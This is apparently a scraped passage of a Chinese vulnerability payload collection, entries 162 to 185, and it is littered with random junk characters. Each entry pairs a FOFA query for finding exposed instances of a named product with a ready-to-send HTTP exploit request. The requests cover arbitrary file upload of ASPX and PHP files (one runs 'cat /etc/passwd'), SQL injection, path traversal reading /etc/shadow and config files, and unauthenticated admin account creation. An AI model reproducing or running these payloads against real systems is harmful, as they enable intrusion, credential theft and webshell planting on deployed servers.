# r1 h/ X6 G$ F5 e( o2 U3 L
) Y! B, ?, f4 T- h8 |http://x.x.x.x/dizxdell.aspx
" h( t p7 L* L& M4 a- D$ x0 f
8 |: g3 c% d: h* j7 N- N, D# ^162. 和丰多媒体信息发布系统 QH.aspx 任意文件上传2 m. B0 M, z# H5 Y$ \7 p
FOFA: app="和丰山海-数字标牌"
G( ~4 p( |7 V* D6 O" I- vPOST /QH.aspx HTTP/1.13 L! k0 `6 e7 r6 k. O
Host: x.x.x.x% M: s: \% e! h5 ?6 X2 L
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0, s( ]0 P7 T g' P( x: h
Connection: close) n5 V2 r2 B9 V1 h6 a
Content-Length: 5831 \. w* S8 F/ E* |- o
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryeegvclmyurlotuey* ~" U) {% r, c ^0 z. Q, o# X0 k
Accept-Encoding: gzip5 e& A7 M0 R2 d8 D5 B
}+ O$ |& Q9 W& {( f. |& Y) X------WebKitFormBoundaryeegvclmyurlotuey
) l: {; s) G) J: UContent-Disposition: form-data; name="fileToUpload"; filename="kjuhitjgk.aspx"8 h. B9 \9 S9 z1 x
Content-Type: application/octet-stream
; W; Z* c0 ^9 `" I/ l+ Z
6 T6 Y/ l6 T# x1 v0 r<% response.write("ujidwqfuuqjalgkvrpqy") %>' w. n+ N D, P- Q( I; h7 `# x
------WebKitFormBoundaryeegvclmyurlotuey
+ k. \; w1 H& {! y! yContent-Disposition: form-data; name="action"0 \' Y2 `( _6 d' M
: @1 R% F% j5 m' S# t
upload! c, T; l, T/ j H g, b
------WebKitFormBoundaryeegvclmyurlotuey/ ~# L6 q! t$ l+ N9 @1 n' x" u
Content-Disposition: form-data; name="responderId"5 J* T: v/ a( S. C6 {$ x
3 y( |& r+ J- P7 j$ [: OResourceNewResponder# W- p" U7 X$ M9 m
------WebKitFormBoundaryeegvclmyurlotuey
4 x8 x. a+ _2 c4 i4 |/ w& T/ VContent-Disposition: form-data; name="remotePath"2 ?1 M* x1 R+ d# p# O' v
M0 y. b9 o S! M! }+ L, t: F/opt/resources! V) D5 k8 n5 [8 Y( s! `' R9 W
------WebKitFormBoundaryeegvclmyurlotuey--
! w- p) f: c4 V6 T& t3 C6 O6 D4 K+ _( v: j7 g
6 c1 ^, L* O% B% R
http://x.x.x.x/opt/resources/kjuhitjgk.aspx
- B' H* W$ p& }- f
5 ~& u' v; D8 n% `) Y1 z5 q. S163. 号卡极团分销管理系统 ue_serve.php 任意文件上传
7 @% Y: U/ U& k+ O% v% q4 mFOFA: icon_hash="-795291075"3 s! Z2 u: ]/ `+ T
POST /admin/controller/ue_serve.php?action=image&encode=utf-8 HTTP/1.1
8 B, m/ v2 G% P7 i: xHost: x.x.x.x
3 |8 f3 r |' [$ n- hUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36. o3 C. Y% M/ E8 @+ Z
Connection: close
5 Q- q2 u: t7 u7 \% i& CContent-Length: 293$ d) [! w% h9 h" \( ^6 T
Accept: */*
7 n( H8 k" R" I$ S$ I% a# ?9 @. fAccept-Encoding: gzip, deflate
' J' a+ K6 O8 i) N& j: W6 WAccept-Language: zh-CN,zh;q=0.9
4 X9 }7 _3 ^, O; o, w* ^Content-Type: multipart/form-data; boundary=----iiqvnofupvhdyrcoqyuujyetjvqgocod2 I3 N% M' g- ~: S6 m7 Q
1 {: J) b- l9 T/ A# ?/ v' X, `& K
------iiqvnofupvhdyrcoqyuujyetjvqgocod1 R' p- E: s; ?+ A7 `
Content-Disposition: form-data; name="name"
. S$ y- t8 T# W% F2 J
/ b. l2 I2 ~/ X, x, {1 `: u1.php: R; Z. }: Y& O# ?- o* {8 X
------iiqvnofupvhdyrcoqyuujyetjvqgocod- a5 q% k! L- s3 N% V
Content-Disposition: form-data; name="upfile"; filename="1.php"" W" K/ L$ o; m7 J# \
Content-Type: image/jpeg m- h F2 r. p9 c# P& p
/ M# P0 A+ P% L+ M. u
rvjhvbhwwuooyiioxega
* K0 D; e$ N8 P. y, ?$ \------iiqvnofupvhdyrcoqyuujyetjvqgocod--
& a' Z4 k. `& U1 i4 J7 F( d" t/ U9 K( N# T4 a- S
, ~$ y! N6 Q/ T6 ]' ]+ \6 \. i9 M$ v164. 慧校园(安校易)管理系统 FileUpProductupdate.aspx 任意文件上传
/ @% J |4 K7 Y1 n5 c4 U; G2 NFOFA: title="智慧综合管理平台登入": c* @/ v+ \" J4 d& x+ j
POST /Module/FileUpPage/FileUpProductupdate.aspx HTTP/1.1! H, z! p, a. l3 v
Host: x.x.x.x6 i! E9 l1 B: R h; \ e& n
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
1 D* M6 N$ S& \Content-Length: 288
: t$ M/ p T+ N7 W' d/ I" m, ]/ PAccept: application/json, text/javascript, */*; q=0.01
# \7 _4 C1 R' t3 SAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2,
' m) [& v* w3 { cConnection: close: ^ v" r8 P( _% ~6 R) d, c* G
Content-Type: multipart/form-data; boundary=----dqdaieopnozbkapjacdbdthlvtlyl" X5 C$ l, |3 Y4 U* Y; B8 l% L
X-Requested-With: XMLHttpRequest
+ V: W( X1 N7 x; d: c! z+ r* P7 O* \% WAccept-Encoding: gzip
" W. a4 q, j; P) |+ l) q1 s
# J" P& I$ w* h% [1 c------dqdaieopnozbkapjacdbdthlvtlyl/ P5 t8 ]5 _1 Q p
Content-Disposition: form-data; name="Filedata"; filename="qaz.aspx". Y) c* K1 R5 V( Z
Content-Type: image/jpeg' f) m1 c; g) L! Q
% R7 z% d# j) v$ B<%@Page Language="C#"%><%Response.Write("aitwpovoxwtgixpfqiys");System.IO.File.Delete(Request.PhysicalPath);%> g* d: I" _ A9 u+ z0 p' `; s
------dqdaieopnozbkapjacdbdthlvtlyl--2 y5 a4 Y* O& [4 b0 V# A
* S. G( y1 I4 W
! c4 l2 M* x- n& U1 L6 g
http://x.x.x.x/Upload/Publish/000000/0_0_0_0/update.aspx, f0 h% f8 J2 g" s7 ]& n
9 P e& ?8 g% J2 s0 z' B165. OrangeHRM 3.3.3 SQL 注入4 _: _# D. @. Q* e8 v, a
CVE-2024-36428
2 a' w g' [' [5 t2 ?' kFOFA: app="OrangeHRM-产品"
4 N! y' f# l* M8 O7 tURL:https://192.168.1.28/symfony/web ... e&sortOrder=ASC,(SELECT (CASE WHEN (5240=5240) THEN 1 ELSE 5240*(SELECT 5240 FROM INFORMATION_SCHEMA.PLUGINS) END))8 x s- G0 q1 j: R# L7 M
) }* Q' u' u6 Q0 o$ c5 V D
2 t8 H0 I) B- u' F( r. m166. 中成科信票务管理平台SeatMapHandler SQL注入" t1 z3 F$ ]0 ^: N9 y5 _" M" |
FOFA:body="技术支持:北京中成科信科技发展有限公司"1 G) R3 ^. w+ O; O7 N/ M7 `
POST /SystemManager/Comm/SeatMapHandler.ashx HTTP/1.1! t3 Z' `! b% u8 m) j( Z, ~
Host:, c' U! q. S; n5 e& d2 c. \9 U6 C3 s( J
Pragma: no-cache/ `, _+ `9 n8 J& ]" ~8 ^
Cache-Control: no-cache7 A- G9 ~ {7 j0 W& o& c9 g
Upgrade-Insecure-Requests: 1! z4 w$ R1 l, M( d
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.369 _& g' U: _, t" [
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
8 P7 Y. P" _ B0 B5 zAccept-Encoding: gzip, deflate
- S1 }+ @; A/ MAccept-Language: zh-CN,zh;q=0.9,en;q=0.8
( s( A/ b8 G$ U$ u( |7 KCookie: ASPSESSIONIDCCRBRCTD=LHLBDIBAKDEGBCJGKIKMNODE
. ?% ~& x: ~ a/ T) TConnection: close/ S9 Y* B8 i5 `7 ?: U$ Q! r
Content-Type: application/x-www-form-urlencoded5 E0 _, s- o) O S+ b
Content-Length: 890 W6 t- s' B. R2 Y' j) V
% E' |. H5 s' v1 s4 ]1 TMethod=GetZoneInfo&solutionNo=%27+AND+4172+IN+%28SELECT+%28CHAR%28104%29%2BCHAR%28101%29%2BCHAR%28108%29%2BCHAR%28108%29%2BCHAR%28111%29%29%29--+bErE
. x5 J5 |9 l' ? U+ y
& `8 \" f3 _6 {7 a; G, ~
2 i: T: L, K4 n, L z# R) G167. 精益价值管理系统 DownLoad.aspx任意文件读取
9 \( C% E/ W: s/ [FOFA:body="/ajax/LVS.Core.Common.STSResult,LVS.Core.Common.ashx"
9 x# Q. t6 n) a4 y7 b o E4 _GET /Business/DownLoad.aspx?p=UploadFile/../Web.Config HTTP/1.1
% h/ o8 E) K3 {- ^Host:
; A9 S8 S* o: Y8 h: AUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
R( }2 y: [9 ^6 k- k4 ]+ [Content-Type: application/x-www-form-urlencoded
3 P: c$ f$ I( wAccept-Encoding: gzip, deflate3 D; A3 \! E, u1 |
Accept: */*' I5 r; @; T0 r! s" K v3 `) @7 u
Connection: keep-alive4 r4 I! F5 d* T9 C5 g
: {3 o' ?: X4 p' t/ h0 i
' b" U3 ?3 ^( E3 H: V! q1 x: o168. 宏景EHR OutputCode 任意文件读取
8 W2 @/ y! n s/ j: DFOFA:app="HJSOFT-HCM". @0 w6 S+ y8 r4 f p
GET /servlet/OutputCode?path=VHmj0PAATTP2HJBPAATTPcyRcHb6hPAATTP2HJFPAATTP59XObqwUZaPAATTP2HJBPAATTP6EvXjT HTTP/1.1
. O6 q* Y; r1 o* HHost: your-ip4 q; \* X# p3 ^' [4 J3 M
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36
; ?7 K' x& |0 N. { o* x# jContent-Type: application/x-www-form-urlencoded
9 V4 M/ E3 K+ n$ w( pConnection: close
# N# e1 Z8 [( Z. W1 A( A% O3 Q* g' K7 l1 _% T( K
9 b5 n: `8 L! \ Z
/ j, d5 {& H/ `/ z( D, o169. 宏景EHR downlawbase SQL注入$ \9 T; w0 t8 U
FOFA:app="HJSOFT-HCM", N( W" u% h# K$ H; D9 i& s6 W8 _
GET /templates/attestation/../../selfservice/lawbase/downlawbase?id=1';WAITFOR+DELAY+'0:0:5'--+ HTTP/1.13 `. E2 u6 j G; `/ h+ P- W
Host: your-ip# V# h( n: F% b& c
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Z; b& \! j" k) V4 X; r0 o! oAccept: */*
3 {4 s) M. l! |+ q3 r. b, wAccept-Encoding: gzip, deflate/ b; d8 K% X0 k" E$ d: n$ p
Connection: close$ i& A! u, v9 G8 S4 t
3 e3 l6 x' |, Q3 ~& g4 s
8 s7 V1 S. Y- @0 h# w
4 L. L+ H% N R; m0 e170. 宏景EHR DisplayExcelCustomReport 任意文件读取/ x6 g% I; p$ d" G1 z& ]
FOFA:body="/general/sys/hjaxmanage.js"
- q( x0 A+ r& ?! u5 M- l1 b% _POST /templates/attestation/../../servlet/DisplayExcelCustomReport HTTP/1.1
+ J. n$ B( Y1 vHost: balalanengliang4 \0 H! v/ w5 O" M, o$ T: X
User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36$ ~! O2 k1 g0 W7 x- N, x3 p" f% ]
Content-Type: application/x-www-form-urlencoded
, d- G9 e5 j$ d# F$ {$ `3 B$ w) k6 a a# k
filename=../webapps/ROOT/WEB-INF/web.xml7 r. c" W% v1 G% u! j- T* J+ H
) [2 ^. E \. C( _6 b3 a
4 k5 m' j+ R3 m/ Q6 ?171. 通天星CMSV6车载定位监控平台 SQL注入, X& E7 s# M9 s4 {9 \
FOFA:body="/808gps/"& d( L! x; r; i1 M7 J' X5 ]
GET /run_stop/delete.do;downloadLogger.action?ids=1)+AND+(SELECT+5394+FROM+(SELECT(SLEEP(5)))tdpw)--+&loadAll=1 HTTP/1.1+ a( w4 u0 }; Q4 A! n! C6 U
Host: your-ip' \6 o d- E$ L y7 L
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.03 _5 L3 K7 r, t/ z! Z. _/ S
Accept: */*5 |* {* T+ S: V' _; d8 H
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
6 x. i3 W- d2 e: @7 K8 YAccept-Encoding: gzip, deflate" }" e' ?% u4 T
Connection: close$ d# G& r+ B6 i8 g6 H
6 H* d8 J( [, _2 m: i/ b0 \/ X
% l1 v! J; g; `- W! F( b I/ u: ?4 m" u! y; C
172. DT-高清车牌识别摄像机任意文件读取
) W) ~9 W6 [% m: i1 N% s) pFOFA:app="DT-高清车牌识别摄像机"
, m) W' T% w- C: g6 w" j* GGET /../../../../etc/passwd HTTP/1.1$ H0 v2 u+ k% E2 l' V
Host: your-ip5 Y+ W* K2 w- K* v/ z& B
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
% R. t, p$ h4 Y6 S; U2 @5 [% JAccept-Encoding: gzip, deflate
1 x. ~9 W/ S" E6 t8 h; o3 X9 ~Accept: */*: W; H6 j$ Z2 _& e `
Connection: keep-alive- U2 N8 ?+ B: o2 s( B
4 Z2 Z! f! O& J+ ?& F$ I9 `; ~
! X# Q$ j G& u" A- }' L" w l
* V: k9 v( Z# Y, Z7 Z/ e173. Check Point 安全网关任意文件读取
& \$ Y; q' _( j( ?9 SCVE-2024-24919! o6 z4 K* ?6 G
FOFA:app="Check_Point-SSL-Network-Extender"3 P1 Y h, e. V- O7 R
POST /clients/MyCRL HTTP/1.1
+ j* j8 \% H' }5 ]& d& HHost: your-ip& o, a9 W z7 o5 d$ Y1 F
Content-Type: application/x-www-form-urlencoded _! V. O; Z y5 t! Y& e" B
: Q7 n" D* a1 w% A8 U8 o( eaCSHELL/../../../../../../../etc/shadow& A1 n0 j: P: p
$ J! d8 _: A' e/ B" `: r& n6 k8 S2 O( t) g- Y3 ~3 _
7 K5 T3 G9 U5 J
174. 金和OA C6 FileDownLoad.aspx 任意文件读取7 a2 P! r2 x/ `$ r, g: W1 S# J
FOFA:app="金和网络-金和OA"& p, R; u4 E0 c9 \
GET /c6/JHSoft.Web.CustomQuery/FileDownLoad.aspx?FilePath=../Resource/JHFileConfig.ini HTTP/1.1( g6 {# S) j+ w* ?
Host: your-ip
8 E2 D9 l# i! m+ f2 }" JUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36# h5 V' y. |' G5 q# V6 m8 {: Y1 ?
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
( D8 }% ?* Y2 V8 q4 \7 Y1 H- vAccept-Encoding: gzip, deflate, br( F% n t: y' K! Y
Accept-Language: zh-CN,zh;q=0.9$ l0 _! M6 \4 j
Connection: close
# w9 R8 n" O3 ^6 ?8 K) u8 L8 S
. |& N H2 N' W: ~2 ^ F. D1 b1 C: W( T' q
/ y, z6 D+ q4 k9 A* c( o' O( m6 |175. 金和OA C6 IncentivePlanFulfill.aspx SQL注入
3 }/ i# R! r' O8 B5 {" z9 Q7 d6 {FOFA:app="金和网络-金和OA"2 }: {/ U( j2 y+ J" a. i
GET /C6/JHSoft.Web.IncentivePlan/IncentivePlanFulfill.aspx/?IncentiveID=1%20WAITFOR%20DELAY%20'0:0:5'--&TVersion=1 HTTP/1.15 P1 g# n6 |7 z* c: b
Host:" }. A) x9 ~& q/ Q' v# c( G. s; M
User-Agent: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36& ]5 F7 @; E8 w; J2 V
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
2 m! M7 P# Z7 S8 i% V$ wAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2' O6 t9 o$ b& w( S; e6 n' k f
Accept-Encoding: gzip, deflate
7 e( {8 N; Y- G" EConnection: close
0 c3 b' V/ n5 b* Y5 _, }$ {4 W9 i* {Upgrade-Insecure-Requests: 11 m8 N$ m; @ H6 w/ b7 W
$ m$ x( H. n! [+ k) H4 k, K3 L5 ]( `
176. 电信网关配置管理系统 rewrite.php 文件上传8 a- w, d" }8 \* k* b
FOFA:body="img/login_bg3.png" && body="系统登录"
) O5 o9 J3 @# E8 M- D ZPOST /manager/teletext/material/rewrite.php HTTP/1.1 a2 M7 @0 {( h4 `, y! i8 {
Host: your-ip- X. ^: c6 ~( k; N+ h
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0( q2 F7 m/ b W1 f, R
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryOKldnDPT% |2 a; b F2 ~
Connection: close
$ j/ I/ L* b/ q8 [/ f- {* b
! \9 v$ V( O: [) a------WebKitFormBoundaryOKldnDPT; a$ A3 N% `( @/ g! f: i
Content-Disposition: form-data; name="tmp_name"; filename="test.php"& M6 O. O+ n; ^4 O2 V' t
Content-Type: image/png3 g: a' `! Q. J z$ F" J" p
1 M1 w7 q0 @6 e& k: F5 p# b2 D
<?php system("cat /etc/passwd");unlink(__FILE__);?>0 R: L) |/ ?! D7 u
------WebKitFormBoundaryOKldnDPT4 K( p% S; O$ x3 B' e* e! ?* h
Content-Disposition: form-data; name="uploadtime"
. ?( z8 R9 [0 v, R, D( E
/ F; `3 B T" F1 [2 n$ X7 `
, }5 q# B/ U8 s! J7 y# y1 o7 [$ G: |------WebKitFormBoundaryOKldnDPT--
4 a ?+ V4 s+ _; o
# T/ A! n$ _0 J* k! H/ g4 ^, i# ?- N: c Q* [* \: V
! M0 @% \) T6 e! ]
177. H3C路由器敏感信息泄露/ x* h6 D2 z. y# y& o
/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg* x# E8 d8 y" C" t" D5 ~8 A) j0 b
/userLogin.asp/../actionpolicy_status/../M60.cfg
* v4 }! T1 Z* W4 S j% {4 Y% Z/userLogin.asp/../actionpolicy_status/../GR8300.cfg {* }' V2 j& q' O1 L7 V" _
/userLogin.asp/../actionpolicy_status/../GR5200.cfg2 y+ A3 A9 E' @6 S; \ M7 V# p
/userLogin.asp/../actionpolicy_status/../GR3200.cfg) J" G- r. y7 i- t
/userLogin.asp/../actionpolicy_status/../GR2200.cfg/ D, D: I& E8 H; e
/userLogin.asp/../actionpolicy_status/../ER8300G2-X.cfg
8 P3 D$ N: O9 j5 p& x/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg
$ F4 K0 e8 n6 I7 s/userLogin.asp/../actionpolicy_status/../ER6300G2.cfg! D. B- Y G; a% x- K& n# ~* ]
/userLogin.asp/../actionpolicy_status/../ER5200G2.cfg# s M3 J: t1 A
/userLogin.asp/../actionpolicy_status/../ER5200.cfg+ ]$ { K# P# v
/userLogin.asp/../actionpolicy_status/../ER5100.cfg/ I) b& f8 d' Y
/userLogin.asp/../actionpolicy_status/../ER3260G2.cfg2 t1 C) h( c3 U
/userLogin.asp/../actionpolicy_status/../ER3260.cfg7 {7 O. j) `! Z
/userLogin.asp/../actionpolicy_status/../ER3200G2.cfg
5 |6 j; ]( D4 z2 ?/userLogin.asp/../actionpolicy_status/../ER3200.cfg! [# a9 y) o0 M! E4 S- J
/userLogin.asp/../actionpolicy_status/../ER3108GW.cfg
" r5 H, _0 f+ S+ I* f3 }/ y/ F/userLogin.asp/../actionpolicy_status/../ER3108G.cfg
4 H9 w$ x5 Q4 {2 _/userLogin.asp/../actionpolicy_status/../ER3100G2.cfg
0 D5 v% h+ ?8 e/userLogin.asp/../actionpolicy_status/../ER3100.cfg& k1 b8 A1 S0 o6 _4 G" l
/userLogin.asp/../actionpolicy_status/../ER2200G2.cfg
3 l. A5 D0 Z" R+ {+ @9 y& f9 O( K0 k& l
+ d( u8 b8 T2 }2 f6 C) v
178. H3C校园网自助服务系统-flexfileupload-任意文件上传$ b8 ~8 d6 U9 Z/ D: J. s B" G- f
FOFA:header="/selfservice"/ H- V1 r; M9 m9 l' ^* {+ U
POST /imc/primepush/%2e%2e/flexFileUpload HTTP/1.1
U& @+ H; l6 w0 s) d: q; X# Y/ eHost:- h9 r& W t+ z3 J% V. M
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
1 R+ h3 j8 W6 U% T- D+ MContent-Length: 252( h: S5 B( a1 O" w# ~! s9 R2 E- Y
Accept-Encoding: gzip, deflate
/ I n6 m7 l. b* x+ \- ~0 jConnection: close
6 {5 |4 y% ]5 h0 KContent-Type: multipart/form-data; boundary=---------------aqutkea7vvanpqy3rh2l4 a4 q* E+ o, H" P
-----------------aqutkea7vvanpqy3rh2l- g* {& j8 j1 M* d1 A' @
Content-Disposition: form-data; name="12234.txt"; filename="12234"
: i2 P! i5 u. o, l! b kContent-Type: application/octet-stream/ c; b$ N: j' ^3 i! } i$ S( u/ g
Content-Length: 255/ p1 ]# S# m0 A
* H7 O7 \& s7 @" r
12234
4 M- `, C: C" h1 m-----------------aqutkea7vvanpqy3rh2l--
) g- G: Q* |) y' }7 Y
' o5 A& e8 }, E! M# v8 A8 \5 b( E
* x; X- O) C6 @( ]GET /imc/primepush/%2e%2e/flex/12234.txt5 z) K2 H* k9 G; @ Z0 Q
) I4 k4 C. I$ I: b: B5 X' @" M$ b2 j" C8 [( C; W
179. 建文工程管理系统存在任意文件读取: Z g' {% m" ?: r8 ~
POST /Common/DownLoad2.aspx HTTP/1.1% m, { j5 [, U6 S
Host: {{Hostname}}' Q$ S$ _+ Q. i; s) l
Content-Type: application/x-www-form-urlencoded* u/ {3 f. {+ G6 I; R, v" h
User-Agent: Mozilla/5.0 ?! Z0 |( w* C+ T& m
% Q4 h, ^! P8 A! ]7 |6 z3 ^path=../log4net.config&Name=$ ^: d. k8 ]* j' n; P7 q$ N2 ?8 J
& [4 G6 J p' C, V- F5 z
( b) b. f% k. \. y
180. 帮管客 CRM jiliyu SQL注入: Z/ @/ Z) ]+ ^
FOFA:app="帮管客-CRM"
6 S' @! x- Q. I! xGET /index.php/jiliyu?keyword=1&page=1&pai=id&sou=soufast&timedsc=激励语列表&xu=and%201=(updatexml(1,concat(0x7e,(select%20user()),0x7e),1)) HTTP/1.1+ v* |5 Q* j2 f6 `' Z
Host: your-ip \$ R! @' r" V+ _$ X. h5 A
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36& ~8 v# K8 ^( ?! X3 m. a
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
, M% { J1 l& {% K5 g% d/ `; cAccept-Encoding: gzip, deflate
! \+ K4 Q0 \6 B! vAccept-Language: zh-CN,zh;q=0.9
3 z- B. q9 M# h3 q# J0 n$ T gConnection: close+ ^0 ?; P: |6 Z+ g1 l9 u
/ i2 F3 X8 G3 i3 [+ z
( l6 d$ }; a2 _/ z
181. 润申信息科技企业标准化管理系统 UpdataLogHandler.ashx SQL注入
$ L5 f. k, W# f7 C! K6 J8 J. cFOFA:"PDCA/js/_publicCom.js"
% j+ L2 R6 J" ^POST /PDCA/ashx/UpdataLogHandler.ashx HTTP/1.1
" L+ p3 V; l8 {* O7 r: ?Host: your-ip: ^# ]9 R; g3 v2 j) i$ W
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36- v" }+ k- j: E9 a: {
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.77 u1 }; P) Y9 a
Accept-Encoding: gzip, deflate, br
4 a: B/ }3 E, u' L" G5 e" P) JAccept-Language: zh-CN,zh;q=0.99 \3 F& a4 h5 I7 J9 V& |+ o
Connection: close
- @/ ~4 G9 ?( U2 K( H# FContent-Type: application/x-www-form-urlencoded
( ]- g6 s2 ^1 a% I9 }6 {
" P4 n+ S" |) ~
5 }) w2 L" f6 \* g# _- taction=GetAll&start=' WAITFOR DELAY '0:0:5'--&end=&code=11&type=2&page=1&rows=20# X$ c2 n! {: ^$ z% m* n" r* n
9 Y! \/ n u" T' ?4 O
' O9 Y% S7 ?+ z+ \
182. 润申科技企业标准化管理系统AddNewsHandler.ashx 任意用户创建
7 @3 o1 J0 j0 r D3 M5 [/ p2 EFOFA:"PDCA/js/_publicCom.js"
" \# ] m$ U4 {* _4 @$ }POST /PDCA/ashx/AddNewsHandler.ashx?action=Adduser HTTP/1.15 I( K9 ^" |- G( v" p
Host: your-ip9 z' R3 b' V- m0 ^6 Z
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.366 Q4 U! c: D i( G: g
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7* m. g$ j# W1 g$ P- C5 P
Accept-Encoding: gzip, deflate, br
2 j& }' I5 q6 q5 QAccept-Language: zh-CN,zh;q=0.9
, Y& K+ \, A. q( Z& R' A/ e8 aConnection: close
- G- _. b1 g2 }( V4 P9 dContent-Type: application/x-www-form-urlencoded
4 K& T( V5 C) L! [4 L0 p1 ?
% G# f& i5 J9 R/ ]5 M$ u0 `& ^9 ]9 i
username=test1234&pwd=test1234&savedays=1- ^' u6 T6 d5 c4 h! c
- f2 ^: d9 t& N$ V1 k) a
* J4 F4 e, y8 \8 I9 U" z, U2 B183. 广州图创图书馆集群管理系统 updOpuserPw SQL注入1 t& X, z2 B8 R- a% K" k( A
FOFA:body="interlib/common/" || body="Interlib图书馆集群管理系统" || body="/interlib3/system_index" || body="打开Interlib主界面"; d7 F: i4 A! B& _( @4 A9 r
GET /interlib3/service/sysop/updOpuserPw?loginid=admin11&newpassword=Aa@123456&token=1%27and+ctxsys.drithsx.sn(1,(select%20111111*111111%20from%20dual))=%272 HTTP/1.1
% I2 M: U4 g: S0 C, YHost: your-ip! \& r& f; {0 }' |2 c% N
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
: K' T/ E% `. n+ L7 _ O* [Accept-Charset: utf-8
: V$ G+ L7 u- G7 l" ?( \* VAccept-Encoding: gzip, deflate
' z9 b% S& X+ zConnection: close9 A* g: w) @, o8 ]+ Q% W
- ?, e+ \0 r9 c* u! Z3 y. x5 n5 R' m/ V! f n& U# {/ e
184. 迅饶科技 X2Modbus 网关 AddUser 任意用户添加
$ Q( S3 k, {* w1 XFOFA:server="SunFull-Webs"7 D. L- c* R, S" r/ ?. M. R& G
POST /soap/AddUser HTTP/1.1+ J6 t2 u% t' E8 z7 ~4 w% o T! J
Host: your-ip
3 a) k- m0 M# A: SAccept-Encoding: gzip, deflate
5 ?2 ]) U7 |3 A- ~5 SUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
+ f( v. \4 Z; o0 p1 p! a; QAccept: application/xml, text/xml, */*; q=0.017 P8 \+ u' H( ]2 F( b; |
Content-Type: text/xml; charset=utf-8% I& |* I$ \9 _0 l6 c8 Z" @4 @
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
3 [( u' ]! @% a" @3 k* F+ ?X-Requested-With: XMLHttpRequest9 x4 N6 ?- H% F- J$ V/ x
7 M, u Q' m8 z: ]
3 q/ e/ l$ _3 ]0 q* Q
insert into userid (USERNAME,PASSWORD,PURVIEW,LOGINDATE,LOGINTIME) values('root','123456','4','2024-5-6','11:7:56')) m, g0 ~ v8 W3 R, {+ }
`, r1 j- g O( K2 M7 u1 `& W5 x! |
185. 瑞友天翼应用虚拟化系统SQL注入
" [) `& n, U1 n4 |5 Q0 c/ Pversion < 7.0.5.1, ?' H5 Q, }$ n
FOFA:app="REALOR-天翼应用虚拟化系统"# A- i( c! M) H' o1 G! P
GET /index.php?s=/Admin/appsave&appid=3%27%29%3Bselect+unhex%28%273c3f706870206563686f206d643528223122293b202466696c65203d205f5f46494c455f5f3b20756e6c696e6b282466696c65293b%27%29+into+outfile+%27.%5C%5C..%5C%5C..%5C%5CWebRoot%5C%5Cplom.xgi%27%23 HTTP/1.10 C! U4 ]* C4 m- |; |% f
Host: host5 L) c+ R+ {2 E) t( y0 B4 u
